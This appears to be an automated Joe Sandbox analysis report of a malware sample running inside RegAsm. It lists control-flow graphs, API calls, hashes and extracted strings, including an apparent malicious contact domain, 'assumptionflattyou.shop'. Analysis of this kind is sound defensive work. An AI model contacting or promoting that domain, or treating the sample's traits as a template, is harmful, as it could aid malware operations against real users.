        • Instruction ID: c7165d82fe636c805970b284572bca58ab6d541bca4355c6786bb0c377731d40
        • Opcode Fuzzy Hash: 9624ef8c797849d53fdd7a1a85c8e779f032b3095da513731e98a57947069b9b
        • Instruction Fuzzy Hash: C521F2B5D01259AFCB00CF9AD884ADEFFB4FF48310F10811AE918A7210C3756954CFA1

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 258 e10c1b-e10c40 262 e10c42 258->262 263 e10c48 258->263 264 e10c44-e10c46 262->264 265 e10c4a-e10c65 262->265 266 e10c68-e10c73 263->266 264->263 264->265 265->266 267 e10c75 266->267 268 e10c7b-e10c81 266->268 269 e10c84-e10c95 267->269 270 e10c77-e10c79 267->270 268->269 271 e10c97 269->271 272 e10c9d-e10cc8 269->272 270->268 270->269 274 e10c99-e10c9b 271->274 275 e10cca-e10cdb 271->275 273 e10cde-e10ce4 272->273 276 e10ce6-e10cf5 273->276 277 e10cfb-e10d06 273->277 274->272 274->275 275->273 276->277 278 e10d08 277->278 279 e10d0e-e10d1c 277->279 278->279 280 e10d0a-e10d0c 278->280 281 e10d24-e10d45 279->281 282 e10d1e 279->282 280->279 284 e10d4b-e10d5c 281->284 283 e10d20-e10d22 282->283 282->284 283->281 283->284 285 e10d64-e10d79 284->285 286 e10d5e 284->286 289 e10d9c-e10dab 285->289 287 e10d60-e10d62 286->287 288 e10d7b-e10d96 286->288 287->285 287->288 288->289 291 e10db3-e10dbb 289->291 292 e10dad 289->292 293 e10dc1-e10dd3 291->293 292->293 294 e10daf-e10db1 292->294 295 e10dd5 293->295 296 e10ddb-e10de5 293->296 294->291 294->293 297 e10e02-e10e09 295->297 298 e10dd7-e10dd9 295->298 296->297 298->296 298->297
        Memory Dump Source
        • Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d871754b17502a4e41c6a353923dafe0dad13a4a21d09657797f91d3f39a9094
        • Instruction ID: 720e2e03e9e8fe306f877c69a444c07663f73a8dedca5a32564804050a9c2f6a
        • Opcode Fuzzy Hash: d871754b17502a4e41c6a353923dafe0dad13a4a21d09657797f91d3f39a9094
        • Instruction Fuzzy Hash: F451F074F016198FDB28CBA8D9C0ADDB3F2BB88314F549569E509FB215CAB06DC48F51

        Execution Graph

        Execution Coverage:1.4%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:40.4%
        Total number of Nodes:94
        Total number of Limit Nodes:10
        execution_graph 12435 409920 12436 409929 12435->12436 12437 409937 12436->12437 12438 409939 GetCurrentProcess 12436->12438 12439 40997a ExitProcess 12437->12439 12440 409944 12438->12440 12441 409948 12440->12441 12442 40994a GetWindowInfo 12440->12442 12469 4357d0 12441->12469 12450 40a800 12442->12450 12446 40996b 12462 40d080 12446->12462 12451 40a896 LoadLibraryExW 12450->12451 12452 40a85a 12450->12452 12454 40a8af 12451->12454 12452->12451 12455 40aaa3 12454->12455 12456 409965 12454->12456 12472 40af80 12454->12472 12478 40b560 12455->12478 12456->12441 12456->12446 12459 40af80 2 API calls 12461 40af18 12459->12461 12460 40abf8 12460->12456 12460->12459 12460->12461 12482 433960 12461->12482 12463 40d0c0 12462->12463 12463->12463 12464 40bd10 2 API calls 12463->12464 12467 40d4b6 12464->12467 12465 40d554 12466 40d4d9 GetSystemDirectoryW 12466->12467 12467->12465 12467->12466 12468 433960 RtlFreeHeap 12467->12468 12468->12467 12505 436990 12469->12505 12471 4357d5 FreeLibrary 12471->12439 12473 40afc4 12472->12473 12486 40bd10 12473->12486 12475 40b304 12475->12454 12476 433960 RtlFreeHeap 12476->12475 12477 40b1d4 12477->12475 12477->12476 12479 40b5f0 12478->12479 12479->12479 12480 4357f0 2 API calls 12479->12480 12481 40b630 12479->12481 12480->12479 12481->12460 12483 433975 12482->12483 12484 433979 RtlFreeHeap 12482->12484 12483->12456 12484->12456 12487 40bf73 12486->12487 12487->12487 12488 40c3d0 12487->12488 12489 40c421 12487->12489 12495 4357f0 12487->12495 12488->12477 12491 40c43b 12489->12491 12492 433960 RtlFreeHeap 12489->12492 12494 40c446 12489->12494 12493 433960 RtlFreeHeap 12491->12493 12492->12491 12493->12494 12494->12477 12494->12494 12496 435886 12495->12496 12497 43580a 12495->12497 12501 435818 12495->12501 12502 4338e0 12496->12502 12499 433960 RtlFreeHeap 12497->12499 12497->12501 12499->12501 12500 43588c 12500->12487 12501->12487 12503 43393e RtlAllocateHeap 12502->12503 12504 433902 12502->12504 12503->12500 12504->12503 12504->12504 12506 436999 12505->12506 12506->12471 12507 40bd10 12508 40bf73 12507->12508 12508->12508 12509 40c3d0 12508->12509 12510 40c421 12508->12510 12511 4357f0 2 API calls 12508->12511 12512 40c43b 12510->12512 12513 433960 RtlFreeHeap 12510->12513 12515 40c446 12510->12515 12511->12508 12514 433960 RtlFreeHeap 12512->12514 12513->12512 12514->12515 12515->12515 12516 4360b3 12518 4360e5 12516->12518 12517 43614e 12518->12517 12520 4358b0 LdrInitializeThunk 12518->12520 12520->12517 12526 4358f0 12528 435904 12526->12528 12527 435911 12528->12527 12530 4358b0 LdrInitializeThunk 12528->12530 12530->12528 12531 435076 12532 4350f5 LoadLibraryExW 12531->12532 12533 4350bc 12531->12533 12540 43510b 12532->12540 12533->12532 12534 43580a 12537 433960 RtlFreeHeap 12534->12537 12539 435434 12534->12539 12535 435886 12536 4338e0 RtlAllocateHeap 12535->12536 12538 43588c 12536->12538 12537->12539 12540->12534 12540->12535 12540->12539 12541 4361b9 12542 4361e9 12541->12542 12545 4358b0 LdrInitializeThunk 12542->12545 12544 43626f 12545->12544 12546 435cce 12548 435c3a 12546->12548 12547 435d2e 12548->12547 12551 4358b0 LdrInitializeThunk 12548->12551 12550 435d4e 12551->12550

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 40a800-40a858 1 40a896-40a8aa LoadLibraryExW call 434c60 0->1 2 40a85a 0->2 5 40a8af-40a8b3 1->5 3 40a860-40a894 2->3 3->1 3->3 6 40af68-40af74 5->6 7 40a8b9-40a9d9 call 436eb0 * 12 5->7 32 40a9e0-40a9f8 call 430a10 7->32 35 40aa00-40aa07 32->35 35->35 36 40aa09-40aa1b 35->36 37 40aa81-40aa91 call 40af80 36->37 38 40aa1d-40aa26 36->38 45 40acd4-40ace1 37->45 46 40aa97-40aa9d 37->46 40 40aa30-40aa33 38->40 42 40aa70-40aa73 40->42 43 40aa35-40aa54 call 40cf00 40->43 44 40aa76-40aa7a 42->44 52 40aa56-40aa5c 43->52 53 40aa5e-40aa64 43->53 44->37 49 40ad01-40ad08 45->49 50 40ace3-40ace7 45->50 46->32 48 40aaa3-40ab9f 46->48 54 40aba1 48->54 55 40abe4-40abfd call 40b560 48->55 49->6 56 40acf0-40acff 50->56 52->40 52->53 53->44 57 40abb0-40abe2 54->57 60 40ac03-40ac58 55->60 61 40ad0d-40ad0f 55->61 56->49 56->56 57->55 57->57 62 40ac94-40ac9f 60->62 63 40ac5a 60->63 61->6 65 40aca1-40aca5 62->65 66 40ad14 62->66 64 40ac60-40ac92 63->64 64->62 64->64 67 40acb7-40acbb 65->67 68 40ad16-40ad18 66->68 69 40af5a 67->69 71 40acc1-40acc8 67->71 68->69 70 40ad1e-40ad42 68->70 74 40af5c-40af65 call 433960 69->74 72 40ad44 70->72 73 40ad86-40ad8f 70->73 75 40acca-40accc 71->75 76 40acce 71->76 77 40ad50-40ad84 72->77 78 40ad91-40ad9b 73->78 79 40adc4-40adc6 73->79 74->6 75->76 81 40acb0-40acb5 76->81 82 40acd0-40acd2 76->82 77->73 77->77 83 40ada7-40adab 78->83 79->69 85 40adcc-40add4 79->85 81->67 81->68 82->81 83->69 86 40adb1-40adb8 83->86 87 40ade0-40ade8 85->87 88 40adba-40adbc 86->88 89 40adbe 86->89 87->87 90 40adea-40aded 87->90 88->89 91 40ada0-40ada5 89->91 92 40adc0-40adc2 89->92 93 40adf3-40adf5 90->93 94 40ae95-40aea4 90->94 91->79 91->83 92->91 95 40ae61-40ae63 93->95 96 40adf7-40ae00 93->96 97 40aeb0-40aeb7 94->97 100 40ae65-40ae6a 95->100 98 40ae17-40ae24 96->98 97->97 99 40aeb9-40aecf 97->99 101 40ae26-40ae2e 98->101 102 40ae3a-40ae4e 98->102 103 40aed1 99->103 104 40af0d-40af1d call 40af80 99->104 100->94 105 40ae6c-40ae79 100->105 106 40ae30-40ae33 101->106 107 40ae35-40ae38 101->107 109 40ae50-40ae58 102->109 110 40ae07-40ae15 102->110 108 40aed3-40aed7 103->108 104->69 122 40af1f-40af2c 104->122 112 40ae7b-40ae83 105->112 113 40ae8e 105->113 106->107 107->102 114 40af07-40af0a 108->114 115 40aed9-40aef5 call 40cf00 108->115 116 40ae02-40ae05 109->116 117 40ae5a-40ae5f 109->117 110->98 110->100 119 40ae85-40ae87 112->119 120 40ae89-40ae8c 112->120 113->94 114->104 127 40aef7-40aefd 115->127 128 40aeff-40af05 115->128 116->110 117->116 119->120 120->113 123 40af51-40af58 122->123 124 40af2e-40af32 122->124 123->74 126 40af40-40af4f 124->126 126->123 126->126 127->108 127->128 128->104
        APIs
        • LoadLibraryExW.KERNELBASE(970F9913,00000000,00000800), ref: 0040A8A2
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID: #_)Q$'C!E$)[%]$.S)U$9O:A$;G#Y$A7|I$D3B5$D?J1$assumptionflattyou.shop$yK{M
        • API String ID: 1029625771-479617566
        • Opcode ID: e1b5bb5a607ee36aba8147ec7f7ad96ba35c91b1c9991fd949a6b3372eb0a575
        • Instruction ID: 034911946247041e9fb8c60a696f5891c7d2b487d79b58c40c0c5eac602a6bf2
        • Opcode Fuzzy Hash: e1b5bb5a607ee36aba8147ec7f7ad96ba35c91b1c9991fd949a6b3372eb0a575
        • Instruction Fuzzy Hash: 1902F1B450C3408FD3109F15D8907AABBE1EF92349F18892EE4C95B3A1D3399959CF9B

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 129 40bd10-40bf71 130 40bfb3-40bfdb 129->130 131 40bf73 129->131 134 40c1d0 130->134 135 40c2e1-40c306 130->135 136 40bfe2-40bfeb 130->136 137 40c1d2 130->137 138 40c004-40c02d 130->138 139 40c1b8-40c1cf 130->139 140 40c1d9-40c23e 130->140 141 40c08c-40c097 130->141 142 40c09c-40c0cd 130->142 143 40c1af-40c1b3 130->143 132 40bf80-40bfb1 131->132 132->130 132->132 134->137 158 40c30d-40c31a 135->158 136->138 137->140 149 40c06b-40c085 138->149 150 40c02f 138->150 139->134 144 40c240-40c26c 140->144 145 40c26e-40c276 140->145 146 40c409-40c41a 141->146 147 40c10c-40c13c 142->147 148 40c0cf 142->148 151 40c3ff 143->151 144->144 144->145 152 40c291-40c2a0 145->152 153 40c278-40c27c 145->153 146->134 146->135 146->137 146->139 146->140 146->141 146->142 146->143 164 40c340-40c34c 146->164 165 40c3d0-40c3d5 146->165 166 40c350-40c378 146->166 167 40c3e0 146->167 168 40c321-40c323 146->168 169 40c421-40c428 146->169 170 40c3e2-40c3ed 146->170 171 40c3c4-40c3c9 146->171 172 40c3f4 146->172 173 40c3f8 146->173 174 40c3a9-40c3bd call 4357f0 146->174 175 40c37f 146->175 155 40c188-40c197 147->155 156 40c13e-40c13f 147->156 154 40c0d0-40c10a 148->154 149->134 149->135 149->137 149->139 149->140 149->141 149->142 149->143 149->164 149->165 149->166 149->167 149->168 149->169 149->170 149->171 149->172 149->173 149->174 149->175 157 40c030-40c069 150->157 151->146 160 40c2a2-40c2a4 152->160 161 40c2c5-40c2df 152->161 159 40c280-40c28f 153->159 154->147 154->154 178 40c19f-40c1a8 155->178 162 40c140-40c186 156->162 157->149 157->157 158->164 158->165 158->166 158->167 158->168 158->169 158->170 158->171 158->172 158->173 158->174 158->175 159->152 159->159 180 40c2b0-40c2c1 160->180 161->135 162->155 162->162 177 40c383-40c388 164->177 165->167 166->165 166->167 166->169 166->170 166->172 166->173 166->175 189 40c32a-40c339 168->189 181 40c440-40c446 call 433960 169->181 182 40c460 169->182 183 40c6f1-40c913 169->183 184 40c435-40c43f call 433960 169->184 185 40c469-40c478 169->185 186 40c44f-40c456 169->186 187 40c42f 169->187 188 40c48f-40c687 169->188 170->169 170->172 170->173 171->165 171->167 171->169 171->170 171->172 171->173 171->175 172->173 173->151 174->165 174->166 174->167 174->169 174->170 174->171 174->172 174->173 174->175 175->177 201 40c38f-40c3a2 177->201 178->134 178->135 178->137 178->139 178->140 178->143 178->164 178->165 178->166 178->167 178->168 178->169 178->170 178->171 178->172 178->173 178->174 178->175 180->180 196 40c2c3 180->196 181->186 182->185 194 40c6e0-40c6eb 183->194 195 40c919 183->195 184->181 186->182 186->183 186->185 186->188 187->184 191 40c6c8-40c6d3 188->191 192 40c689 188->192 189->164 189->165 189->166 189->167 189->169 189->170 189->171 189->172 189->173 189->174 189->175 191->183 202 40c690-40c6c6 192->202 194->183 203 40c920-40c956 195->203 196->161 201->165 201->166 201->167 201->169 201->170 201->171 201->172 201->173 201->174 201->175 202->191 202->202 203->203 207 40c958 203->207 207->194
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: -e0c$9i7g$PV$a-e+$c)t'$k%h#$}#{$f
        • API String ID: 0-3076811574
        • Opcode ID: 43986b35fc01c073c23a74b231db141d03d21052ebb2637f36efb9902614357b
        • Instruction ID: 577c2644e709fb3fbdcc4a6f76d5c3f94ebe82d2132819d6a2a7b6e8fd985dee
        • Opcode Fuzzy Hash: 43986b35fc01c073c23a74b231db141d03d21052ebb2637f36efb9902614357b
        • Instruction Fuzzy Hash: 426265B4509381CFE320DF15E884B6ABBB1FF85300F158AACE5896B362D7359845CF96

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 208 435076-4350ba 209 4350f5-435105 LoadLibraryExW 208->209 210 4350bc-4350bf 208->210 212 435374-435389 209->212 213 43510b-43511d 209->213 211 4350c0-4350f3 210->211 211->209 211->211 214 435609-435620 212->214 213->212 216 435627-435632 214->216 216->214 217 435422-43542d 216->217 218 435727-435749 216->218 219 43564b-435662 216->219 220 435669-435674 216->220 221 4353e8-4353ee 216->221 222 435468-43550f call 436eb0 * 4 216->222 223 4356a8-4356bc 216->223 224 43538e-435399 216->224 225 435750-43576d 216->225 226 435597-4355a2 216->226 227 435456-435461 216->227 228 435696-4356a1 216->228 229 435715-43571d 216->229 230 4353f5-435401 216->230 231 435434 216->231 232 435774-435791 216->232 233 43567b-43568e 216->233 234 43543a-43544c call 42feb0 216->234 235 435639-435644 216->235 236 435798-4357ba 216->236 217->214 217->223 217->224 217->225 217->226 217->228 217->229 217->231 217->232 217->233 217->234 218->214 218->217 218->220 218->221 218->222 218->223 218->224 218->225 218->226 218->227 218->228 218->229 218->230 218->231 218->232 218->233 218->234 219->214 219->217 219->220 219->221 219->222 219->223 219->224 219->225 219->226 219->227 219->228 219->229 219->230 219->231 219->232 219->233 219->234 220->214 220->224 220->225 220->226 220->229 220->233 221->214 221->217 221->220 221->222 221->223 221->224 221->225 221->226 221->228 221->229 221->230 221->231 221->232 221->233 221->234 273 435553-43556c call 4369b0 222->273 274 435511 222->274 223->214 223->224 223->225 223->226 223->229 223->233 223->234 239 4356c3-4356e5 223->239 224->214 224->217 224->220 224->221 224->222 224->223 224->224 224->225 224->226 224->227 224->228 224->229 224->230 224->231 224->232 224->233 224->234 241 4353a0-4353ab 224->241 225->214 225->224 225->226 225->229 225->232 226->214 226->229 226->239 240 43580a-435811 226->240 242 435891-43589a call 433960 226->242 243 435886-435887 call 4338e0 226->243 244 4355bb-4355d2 226->244 245 4355eb-435602 226->245 246 4355a9-4355b4 226->246 247 4355d9-4355e4 226->247 248 435818-435832 226->248 249 4356ec-43570e 226->249 227->214 227->217 227->220 227->222 227->223 227->224 227->225 227->226 227->228 227->229 227->231 227->232 227->233 227->234 228->214 228->223 228->224 228->225 228->226 228->229 228->232 228->233 228->234 251 435720 229->251 257 435410-43541b 230->257 232->214 232->225 232->229 232->233 232->234 232->236 233->228 234->227 235->214 235->217 235->219 235->220 235->221 235->222 235->223 235->224 235->225 235->226 235->227 235->228 235->229 235->230 235->231 235->232 235->233 235->234 235->236 236->214 236->217 236->220 236->221 236->222 236->223 236->225 236->227 236->228 236->229 236->230 236->231 236->232 236->233 236->234 236->240 239->214 239->229 239->240 239->242 239->243 239->245 239->248 239->249 240->242 240->248 241->216 241->218 241->219 241->235 256 4353b2-4353bd 241->256 241->257 258 4353d6-4353e1 241->258 259 435585-435590 241->259 260 4353c4-4353cf 241->260 268 43589c-4358a0 242->268 264 43588c-435890 243->264 244->214 244->229 244->240 244->242 244->243 244->245 244->247 244->248 244->249 245->214 245->229 245->240 245->242 245->243 245->248 246->214 246->229 246->239 246->240 246->242 246->243 246->244 246->245 246->248 246->249 247->214 247->229 247->240 247->242 247->243 247->245 247->248 247->249 253 435870-435884 248->253 254 435834 248->254 249->214 249->229 249->240 249->242 249->243 249->248 251->251 253->268 263 435840-43586e 254->263 256->214 256->216 256->217 256->218 256->219 256->220 256->221 256->222 256->223 256->224 256->225 256->226 256->227 256->228 256->229 256->230 256->231 256->232 256->233 256->234 256->235 256->236 256->257 256->258 256->260 257->214 257->217 257->220 257->223 257->224 257->225 257->226 257->228 257->229 257->231 257->232 257->233 257->234 258->214 258->217 258->220 258->221 258->222 258->223 258->224 258->225 258->226 258->227 258->228 258->229 258->230 258->231 258->232 258->233 258->234 259->224 259->226 260->214 260->216 260->217 260->218 260->219 260->220 260->221 260->222 260->223 260->224 260->225 260->226 260->227 260->228 260->229 260->230 260->231 260->232 260->233 260->234 260->235 260->236 260->258 263->253 263->263 278 435573-43557b 273->278 279 43556e 273->279 275 435520-435551 274->275 275->273 275->275 278->259 279->278
        APIs
        • LoadLibraryExW.KERNELBASE(41D447A9,00000000,00000800), ref: 00435101
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID: sr}
        • API String ID: 1029625771-1314242954
        • Opcode ID: ebd350a806b6267d54850dcc7634231ec96fc33bb10cae1b160b277ce83be72e
        • Instruction ID: 0a7d2faaf7a5ff4dce4cd146d2c275749102720c1c2d5abf0c4620ad6cd393b1
        • Opcode Fuzzy Hash: ebd350a806b6267d54850dcc7634231ec96fc33bb10cae1b160b277ce83be72e
        • Instruction Fuzzy Hash: F021797560D340AFC304CF25E5A162FBBF1ABDA601F64882DE4C957381C634DA06CB5B

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 285 4358f0-43590a call 436280 288 435911-435b08 285->288 289 435920 285->289 290 435926-435932 285->290 291 435939 285->291 292 43593f-435b45 call 4377f0 285->292 289->290 290->291 290->292 291->292 299 435b52-435b99 292->299 300 435e25-435e64 292->300 301 435b4c 292->301 302 435edc-435f1b 292->302 305 435b9b 299->305 306 435bde-435bea 299->306 307 435e66 300->307 308 435ead-435eb9 300->308 301->299 303 435f5d-435f69 302->303 304 435f1d-435f1f 302->304 313 435f81 303->313 314 435f6b-435f6f 303->314 311 435f20-435f5b 304->311 312 435ba0-435bdc 305->312 315 435c01-435c06 306->315 316 435bec 306->316 317 435e70-435eab 307->317 309 435ed1 308->309 310 435ebb-435ebf 308->310 309->302 318 435ec0-435ecf 310->318 311->303 311->311 312->306 312->312 321 435f8b-435f9b call 434c80 313->321 319 435f70-435f7f 314->319 315->321 320 435bf0-435bff 316->320 317->308 317->317 318->309 318->318 319->313 319->319 320->315 320->320 324 435fb1-436015 321->324 325 435f9d 321->325 327 436017 324->327 328 43604e-43605a 324->328 326 435fa0-435faf 325->326 326->324 326->326 329 436020-43604c 327->329 330 4360a5-4360ac 328->330 331 43605c-436064 328->331 329->328 329->329 330->300 330->302 330->321 332 436070-436077 331->332 333 436080-436086 332->333 334 436079-43607c 332->334 333->330 336 436088-43609d call 4358b0 333->336 334->332 335 43607e 334->335 335->330 338 4360a2 336->338 338->330
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: @$wq
        • API String ID: 0-4113691029
        • Opcode ID: 382f5bc31001be75b39dd734d104d68c751c36c66b7faad8aa9868fcf780823e
        • Instruction ID: 0c906ebc65f380bf470a555f5154013bd3eaf3e537455d20ef1bd230b860c2cd
        • Opcode Fuzzy Hash: 382f5bc31001be75b39dd734d104d68c751c36c66b7faad8aa9868fcf780823e
        • Instruction Fuzzy Hash: 3CA163B4108341ABC304CF18D59162BB7F1FF8A749F50992EF4C99B261E338D901DB4A

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 339 435c11-435c17 340 435c20-435c26 339->340 341 435c19-435c1c 339->341 344 435c3a-435c5a 340->344 345 435c28-435c37 call 4358b0 340->345 342 435c10 341->342 343 435c1e 341->343 342->339 343->344 347 435c90-435c98 344->347 348 435c5c-435c5f 344->348 345->344 349 435c9a-435ca6 347->349 350 435cc8 347->350 352 435c60-435c8e 348->352 353 435cb0-435cb7 349->353 356 435d3f-435d49 call 4358b0 350->356 352->347 352->352 354 435cc0-435cc6 353->354 355 435cb9-435cbc 353->355 354->350 354->356 355->353 357 435cbe 355->357 359 435d4e 356->359 357->350
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID: 4`[b$4`[b
        • API String ID: 2994545307-3640500014
        • Opcode ID: fad40bbdfd25b68f54aed223f91cc9fbae25ba9bab07484ea3621333f03fe624
        • Instruction ID: c1bd9dd9ae5a31842157fe631375f338841f43209ed37e43ea1e5e215c8b9a87
        • Opcode Fuzzy Hash: fad40bbdfd25b68f54aed223f91cc9fbae25ba9bab07484ea3621333f03fe624
        • Instruction Fuzzy Hash: 9921A435208701EBD729DF04D4A0A3FB3A2FF9A709F94AA1ED58217355C3399851CB9E

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 364 4358b0-4358e2 LdrInitializeThunk
        APIs
        • LdrInitializeThunk.NTDLL(00437B8F,005C003F,00000006,?,?,00000018,700F0E0D,?,?), ref: 004358DE
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID:
        • API String ID: 2994545307-0
        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 280 433960-43396e 281 433975-433978 280->281 282 433979-43398e 280->282 283 4339c0-4339d6 RtlFreeHeap 282->283 284 433990-4339be 282->284 284->283 284->284
        APIs
        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004339CD
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID: `123
        • API String ID: 3298025750-1835766495
        • Opcode ID: 62002a7d3e0658357d5e006fef020dde4b90f8a974b23afd1862a5025c141389
        • Instruction ID: 6ec2f0a5b2c956332e150181788087568aae935c8c55b0e5a7a8aa430f7a3b90
        • Opcode Fuzzy Hash: 62002a7d3e0658357d5e006fef020dde4b90f8a974b23afd1862a5025c141389
        • Instruction Fuzzy Hash: A8014F7420C241CBD318EF18D561B2EFBE1EF85705F54892CD5CA47791C7359864CB46

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 360 4338e0-433900 361 433902 360->361 362 43393e-433958 RtlAllocateHeap 360->362 363 433910-43393c 361->363 363->362 363->363
        APIs
        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043394F
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 2665456c9de08df5721046b6f0c98ae93c38ef158d7d8ce0b713934606d97a5c
        • Instruction ID: b13666b2c59fc3d376935adbc0db412a6a92a92454552c9f2ff8b7d0694dfcb5
        • Opcode Fuzzy Hash: 2665456c9de08df5721046b6f0c98ae93c38ef158d7d8ce0b713934606d97a5c
        • Instruction Fuzzy Hash: 7DF0BDB4208280AFD305EF18C990B1ABBE1EB99701F548D5CE4D487362C27AE825CB5A
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: $r!$!2)'$,\Ry$--',$5:2?$IMB9$UT_8$f@~T$m[h]$nLv'${FG{
        • API String ID: 0-2498188146
        • Opcode ID: 16058d4af700f765c8c6f82807d740a2c0b7fe626f3ee33c788c2d8152ec63c3
        • Instruction ID: 8b58e684f7e0e0186c5c63939ae6b41da82ad5973140cf0599c38befe8799fd9
        • Opcode Fuzzy Hash: 16058d4af700f765c8c6f82807d740a2c0b7fe626f3ee33c788c2d8152ec63c3
        • Instruction Fuzzy Hash: 2243D070204B928BD325CF39D1947A3FBE2AF52304F58896EC4EB4B792C779A445CB58
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ($0$Qlgf$TB]U$aTmP$dg$sm$wq${u
        • API String ID: 0-3713301332
        • Opcode ID: 8fbe1d29347ef24581e0ebfb0a7c1454b2b7d4e1cae502f35c6f1e08814cc552
        • Instruction ID: 0fee8b461fb77af47e0f40fedb3bff6b147af60b01c0481e2aa57128188a342d
        • Opcode Fuzzy Hash: 8fbe1d29347ef24581e0ebfb0a7c1454b2b7d4e1cae502f35c6f1e08814cc552
        • Instruction Fuzzy Hash: 72E133B020C3809BD314DF19C490A2FBBE1EF96718F148A2DE5D99B392C7399915CB5B
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: '$#<$/,3&$D D$"54$'#?$S2Q_]$S2Q_]$_]
        • API String ID: 0-350254822
        • Opcode ID: 9fc90c7ae9629e37039838e83542b11fad433be623311c3f9cfb602516df1763
        • Instruction ID: e09261184a5b9957d17bb30db2595d5947a8f109d62d43c00a67e421f01136d6
        • Opcode Fuzzy Hash: 9fc90c7ae9629e37039838e83542b11fad433be623311c3f9cfb602516df1763
        • Instruction Fuzzy Hash: BAA2DEB0904219CFDB14CF54C8916EFBBB2FF86314F18855DD4966B382C739A986CB98
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: TU$WQ$qu${q
        • API String ID: 0-283785601
        • Opcode ID: c57760108ba52eff105da043fa4158ac0ad73176cd098a269709e4e794c4a609
        • Instruction ID: 4aba18db4194ba8a6928d0f7ea27ec875d8cd51b6fab7e66d1762f57d9f78f75
        • Opcode Fuzzy Hash: c57760108ba52eff105da043fa4158ac0ad73176cd098a269709e4e794c4a609
        • Instruction Fuzzy Hash: 4E0252B01093809BD314DF09D890A6BBBF1EF95748F144A2DE1D98B361D339D986CB9B
        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.2248190403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
